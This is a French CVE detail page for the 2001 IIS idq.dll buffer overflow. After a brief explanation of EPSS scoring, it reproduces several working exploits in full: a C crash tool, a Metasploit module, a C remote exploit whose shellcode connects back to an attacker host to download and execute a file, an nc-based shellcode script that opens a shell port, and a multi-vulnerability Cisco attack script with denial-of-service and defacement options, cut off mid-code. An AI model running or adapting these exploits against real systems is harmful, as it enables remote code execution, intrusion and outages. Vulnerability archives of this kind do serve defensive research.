CVE-2001-0500 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/2880/info Windows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context. Note that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running. Note also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable. // DoS for isapi idq.dll unchecked buffer. // For Testing Pruposes // By Ps0 DtMF dot com dot ar #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <errno.h> // #define DEBUG int main(int argc, char *argv[]) { char mensaje[800]; char *bof; int fd; struct sockaddr_in sin; struct hostent *rhost; if(argc<2) { fprintf(stderr,"Use : %s host\n",argv[0]); exit(0); } bzero(mensaje,strlen(mensaje)); bof=(char *)malloc(240); // 240 segun eeye , si se le da mas NO anda memset(bof,'A',240); sprintf(mensaje,"GET /NULL.ida?%s=X HTTP/1.0\n\n",bof); #ifdef DEBUG printf("\nMenssage : \n%s\n",mensaje); #endif if ((rhost=gethostbyname(argv[1]))==NULL){ printf("\nCan't find remote host %s \t E:%d\n",argv[1],h_errno); return -1; } sin.sin_family=AF_INET; sin.sin_port=htons(80); memcpy(&sin.sin_addr.s_addr, rhost->h_addr, rhost->h_length); fd = socket(AF_INET,SOCK_STREAM,6); if (connect(fd,(struct sockaddr *)&sin, sizeof(struct sockaddr))!=0){ printf("\nCan't Connect to The host %s. May be down ? E:%s\n",argv[1],strerror(errno)); return -1; } printf("Sending string........\n"); if(send(fd,mensaje,strlen(mensaje),0)==-1){ printf("\nError \n"); return -1; } printf("\nString Sent... try telnet host 80 to check if IIS is down\n"); close(fd); return 0; }

## # $Id: ms01_033_idq.rb 9525 2010-06-15 07:18:08Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9525 $', 'References' => [ [ 'CVE', '2001-0500'], [ 'OSVDB', '568'], [ 'MSB', 'MS01-033'], [ 'BID', '2880'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => false, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ], [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ], ], 'DisclosureDate' => 'Jun 18 2001', 'DefaultTarget' => 0)) register_options([Opt::RPORT(80)], self.class) end def exploit connect sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232) sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46) uri = '/' + sploit + payload.encoded res = "GET #{uri}\r\n\r\n" print_status("Trying target #{target.name}...") sock.put(res) handler disconnect end end

/* source: https://www.securityfocus.com/bid/2880/info Windows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context. Note that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running. Note also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable. */ /* IIS5.0 .idq overrun remote exploit Programmed by hsj : 01.06.21 code flow: overrun -> jmp or call ebx -> jmp 8 -> check shellcode addr and jump to there -> shellcode -> make back channel -> download & exec code */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/time.h> #include <sys/wait.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <limits.h> #include <netdb.h> #include <arpa/inet.h> #define RET 0x77e516de /* jmp or call ebx */ #define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */ #define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */ #define GMHANDLEA_OFFSET 24 #define GPADDRESS_OFFSET 61 #define OFFSET 234 /* exception handler offset */ #define NOP 0x41 #define MASKING 1 #if MASKING #define PORTMASK 0x4141 #define ADDRMASK 0x41414141 #define PORTMASK_OFFSET 128 #define ADDRMASK_OFFSET 133 #endif #define PORT 80 #define ADDR "attacker.mydomain.co.jp" #define PORT_OFFSET 115 #define ADDR_OFFSET 120 unsigned char shellcode[]= "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50" "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB" "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0" "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11" #if MASKING "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41" #endif "\x8B\x46\xF8\xFF\xD0\x33\xC0" "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0" "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46" "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0"; unsigned char storage[]= "\xEB\x02" "\xEB\x4E" "\xE8\xF9\xFF\xFF\xFF" "msvcrt.ws2_32.socket.connect.recv.closesocket." "_open._write._close._execl."; unsigned char forwardjump[]= "%u08eb"; unsigned char jump_to_shell[]= "%uC033%uB866%u031F%u0340%u8BD8%u8B03" "%u6840%uDB33%u30B3%uC303%uE0FF"; unsigned int resolve(char *name) { struct hostent *he; unsigned int ip; if((ip=inet_addr(name))==(-1)) { if((he=gethostbyname(name))==0) return 0; memcpy(&ip,he->h_addr,4); } return ip; } int make_connection(char *address,int port) { struct sockaddr_in server,target; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&server,0,sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = 0; target.sin_family = AF_INET; target.sin_addr.s_addr = resolve(address); if(target.sin_addr.s_addr==0) { close(s); return -2; } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = 10; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -3; } if(i==0) { close(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); errno = bf; return -5; } ioctl(s,FIONBIO,&bf); return s; } int get_connection(int port) { struct sockaddr_in local,remote; int lsock,csock,len,reuse_addr; lsock = socket(AF_INET,SOCK_STREAM,0); if(lsock<0) { perror("socket"); exit(1); } reuse_addr = 1; if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reus e_addr))<0) { perror("setsockopt"); close(lsock); exit(1); } memset((char *)&local,0,sizeof(local)); local.sin_family = AF_INET; local.sin_port = htons(port); local.sin_addr.s_addr = htonl(INADDR_ANY); if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) { perror("bind"); close(lsock); exit(1); } if(listen(lsock,1)<0) { perror("listen"); close(lsock); exit(1); } retry: len = sizeof(remote); csock = accept(lsock,(struct sockaddr *)&remote,&len); if(csock<0) { if(errno!=EINTR) { perror("accept"); close(lsock); exit(1); } else goto retry; } close(lsock); return csock; } int main(int argc,char *argv[]) { int i,j,s,pid; unsigned int cb; unsigned short port; char *p,buf[512],buf2[512],buf3[2048]; FILE *fp; if(argc!=3) { printf("usage: $ %s ip file\n",argv[0]); return -1; } if((fp=fopen(argv[2],"rb"))==0) return -2; if(!(cb=resolve(ADDR))) return -3; if((pid=fork())<0) return -4; if(pid) { fclose(fp); s = make_connection(argv[1],80); if(s<0) { printf("connect error:[%d].\n",s); kill(pid,SIGTERM); return -5; } j = strlen(shellcode); *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA; *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS; port = htons(PORT); #if MASKING port ^= PORTMASK; cb ^= ADDRMASK; *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK; *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK; #endif *(unsigned short *)&shellcode[PORT_OFFSET] = port; *(unsigned int *)&shellcode[ADDR_OFFSET] = cb; for(i=0;i<strlen(shellcode);i++) { if((shellcode[i]==0x0a)|| (shellcode[i]==0x0d)|| (shellcode[i]==0x3a)) break; } if(i!=j) { printf("bad portno or ip address...\n"); close(s); kill(pid,SIGTERM); return -6; } memset(buf,1,sizeof(buf)); p = &buf[OFFSET-2]; sprintf(p,"%s",forwardjump); p += strlen(forwardjump); *p++ = 1; *p++ = '%'; *p++ = 'u'; sprintf(p,"%04x",(RET>>0)&0xffff); p += 4; *p++ = '%'; *p++ = 'u'; sprintf(p,"%04x",(RET>>16)&0xffff); p += 4; *p++ = 1; sprintf(p,"%s",jump_to_shell); memset(buf2,NOP,sizeof(buf2)); memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage, strlen(storage)); memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellco de)); buf2[sizeof(buf2)-1] = 0; sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n",buf,buf2); write(s,buf3,strlen(buf3)); printf("---"); for(i=0;i<strlen(buf3);i++) { if((i%16)==0) printf("\n"); printf("%02X ",buf3[i]&0xff); } printf("\n---\n"); wait(0); sleep(1); shutdown(s,2); close(s); printf("Done.\n"); } else { s = get_connection(PORT); j = 0; while((i=fread(buf,1,sizeof(buf),fp))) { write(s,buf,i); j += i; printf("."); fflush(stdout); } fclose(fp); printf("\n%d bytes send...\n",j); shutdown(s,2); close(s); } return 0; }

# source: https://www.securityfocus.com/bid/2880/info # # Windows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context. # # Note that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running. # # Note also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable. # #!/bin/sh # .ida nasty exploit # [email protected],[email protected] # http://monkey.org/~mat # # If this exploit succeeds, you can get into the machine through port 8008 # shellcode generated by DeepZone generator # I only tested this code under W2k Korean Version, so the offset value may vary through systems, you can get the offset value with WinDbg tool included in Windows SDK # # How to get the offset: # 1. start windbg and attach to inetinfo.exe process. and go(F5) # 2. using this script attack the test machine # 3. if the offset in this script is not valid, then inetinfo.exe will be got break. # 4. you can search the shellcode position with following command # s 10000 Lfffff 0x68 0x5e 0x56 0xc3 0x90 # 5. if the shellcode position is 0xaabbccdd # then you can change the %u...%u...to %uccdd%uaabb target=$1 SHELLCODE=`printf "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x9 0\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf 3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09\xc0\x7 1\x23\x9b\x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xb c\xd9\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x9 9\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc 9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9\x99\x14\x24\xb4\xbf\xd 9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc! \xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf \xf3\x99\xf3\x99\xf3\x89\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99 \x99\x09\xf1\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9 \x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99\x14\x2c\xcc \xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32\xaa\x59\xc9\x14\x24\xfc \xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4 \x09\x09\x09\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3 \xa9\x66\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99\xe! b\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc 9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x12\x1 c\xfc\xbf\xd9\x99\xf3\x99\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x9 9\x14\x24\xfc\xbf\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0 c\xd6\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8\xbf\xd 9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x9 9\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd 9\x99\xf3\x99\x12\x1c\xf8\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x! 34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x70\x20\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x 8b\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1\xe5\x89\x 99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d\x59\xec\x62\xc1\x32\x c0\x7b\x70\x5a\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\x f8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\x cb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\x f6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x 99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\! x99\xca\xf5\xfc\xfc\xe9\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\ xda\xf6\xfd\xfc\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\ xfe\xa7\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99\x99\ x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\ x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\ x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\ x99\x99\x99\x99\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\ x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90"` #for w2k no sp: #GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x HTTP/1.0" #for w2k sp2: GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x HTTP/1.0" nc $target 80 <<EOF `echo $GET_LINE` yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE EOF

# source: https://www.securityfocus.com/bid/2880/info # # Windows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context. # # Note that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running. # # Note also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable. # #!/usr/bin/perl ## # Cisco Global Exploiter # # Legal notes : # The BlackAngels staff refuse all responsabilities # for an incorrect or illegal use of this software # or for eventual damages to others systems. # # http://www.blackangels.it ## ## # Modules ## use Socket; use IO::Socket; ## # Main ## $host = ""; $expvuln = ""; $host = @ARGV[ 0 ]; $expvuln = @ARGV[ 1 ]; if ($host eq "") { usage(); } if ($expvuln eq "") { usage(); } if ($expvuln eq "1") { cisco1(); } elsif ($expvuln eq "2") { cisco2(); } elsif ($expvuln eq "3") { cisco3(); } elsif ($expvuln eq "4") { cisco4(); } elsif ($expvuln eq "5") { cisco5(); } elsif ($expvuln eq "6") { cisco6(); } elsif ($expvuln eq "7") { cisco7(); } elsif ($expvuln eq "8") { cisco8(); } elsif ($expvuln eq "9") { cisco9(); } elsif ($expvuln eq "10") { cisco10(); } elsif ($expvuln eq "11") { cisco11(); } elsif ($expvuln eq "12") { cisco12(); } elsif ($expvuln eq "13") { cisco13(); } elsif ($expvuln eq "14") { cisco14(); } else { printf "\nInvalid vulnerability number ...\n\n"; exit(1); } ## # Functions ## sub usage { printf "\nUsage :\n"; printf "perl cge.pl <target> <vulnerability number>\n\n"; printf "Vulnerabilities list :\n"; printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n"; printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n"; printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n"; printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n"; exit(1); } sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability { my $serv = $host; my $dch = "?????????????????a~ %%%%%XX%%%%%"; my $num = 30000; my $string .= $dch x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("No telnet server detected on $serv ...\n\n"); $sockd->autoflush(1); print $sockd "$string". $shc; while (<$sockd>){ print } print("\nPacket sent ...\n"); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("Vulnerability successful exploited. Target server is down ...\n\n"); print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco2 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0; LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); $n++; foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} } if ($fg==1) { sleep(2); print "Vulnerability unsuccessful exploited ...\n\n"; } else { sleep(2); print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n"; last LAB; } sub exploit { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Unable to initialize socket ...\n\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("No http server detected on $serv ...\n\n"); } } } exit(1); } sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability { my $serv = $host; my $n = 16; while ($n <100) { exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); $wr =~ s/\n//g; if ($wr =~ /200 ok/) { while(1) { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; print "[1] Banner change\n"; print "[2] List vty 0 4 acl info\n"; print "[3] Other\n"; print "Enter a valid option [ 1 - 2 - 3 ] : "; $vuln = <STDIN>; chomp($vuln); if ($vuln == 1) { print "\nEnter deface line : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n"); } elsif ($vuln == 2) { exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); print "$wrf"; } elsif ($vuln == 3) { print "\nEnter attack URL : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /$vuln HTTP/1.0\n\n"); print "$wrf"; } } } $wr = ""; $n++; } die "Vulnerability unsuccessful exploited ...\n\n"; sub exploit1 { my $sockd = IO::Socket::INET -> new ( Proto => 'tcp', PeerAddr => $serv, PeerPort => 80, Type => SOCK_STREAM, Timeout => 5); unless($sockd){die "No http server detected on $serv ...\n\n"} $sockd->autoflush(1); $sockd -> send($_[0]); while(<$sockd>){$wr .= $_} $wrf = $wr; close $sockd; } exit(1); } sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability { my $serv = $host; my $port = 22; my $vuln = "a%a%a%a%a%a%a%"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No ssh server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); exit(1); } sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET ? HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No 